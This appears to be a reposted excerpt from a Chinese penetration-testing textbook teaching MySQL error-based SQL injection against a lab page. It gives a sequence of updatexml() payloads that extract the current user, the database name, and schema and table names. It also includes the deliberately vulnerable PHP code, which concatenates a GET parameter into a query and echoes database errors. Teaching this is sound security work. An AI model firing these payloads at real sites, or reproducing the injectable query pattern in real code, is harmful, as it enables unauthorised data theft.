本文选自《web安全攻防渗透测试实战指南(第2版)》
点击图片五折购书
报错注入攻击的测试地址在本书第2章。
先访问error.php?username=1',因为参数username的值是1'。在数据库中执行SQL时,会因为多了一个单引号而报错,输出到页面的结果如图4-35所示。
图4-35
通过页面返回结果可以看出,程序直接将错误信息输出到了页面上,所以此处可以利用报错注入获取数据。报错注入有多种利用方式,此处只讲解利用MySQL函数updatexml()获取user()的值,SQL语句如下:
1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
其中0x7e是ASCII编码,解码结果为~,如图4-36所示。
图4-36
然后尝试获取当前数据库的库名,语句如下:
1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
得到的结果如图4-37所示。
图4-37
接着可以利用select语句继续获取数据库中的库名、表名和字段名,查询语句与Union注入的查询语句相同。因为报错注入只显示一条结果,所以需要使用limit语句。构造的语句如下:
1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)--+
结果如图4-38所示,可以获取数据库的库名。
图4-38
构造查询表名的语句如下:
1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema= 'test' limit 0,1),0x7e),1)--+
如图4-39所示,可以获取数据库test的表名。
图4-39
在报错注入页面,程序获取GET参数username后,将username拼接到SQL语句中,然后到数据库查询。如果执行成功,就输出ok;如果出错,则通过echo mysqli_error($con)将错误信息输出到页面(mysqli_error返回上一个MySQL函数的错误),代码如下:
$con=mysqli_connect("localhost","root","123456","test");
if (mysqli_connect_errno())
{
echo "连接失败: " . mysqli_connect_error();
}
$username = $_GET['username'];
if($result = mysqli_query($con,"select * from users where `username`='".$username."'")){
echo "ok";
}else{
echo mysqli_error($con);
}
输入username=1'时,SQL语句为select * from users where `username`='1''。执行时,会因为多了一个单引号而报错。利用这种错误回显,可以通过floor()、updatexml()等函数将要查询的内容输出到页面上。
— 实验室旗下直播培训课程 —
和20000+位同学加入MS08067一起学习
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...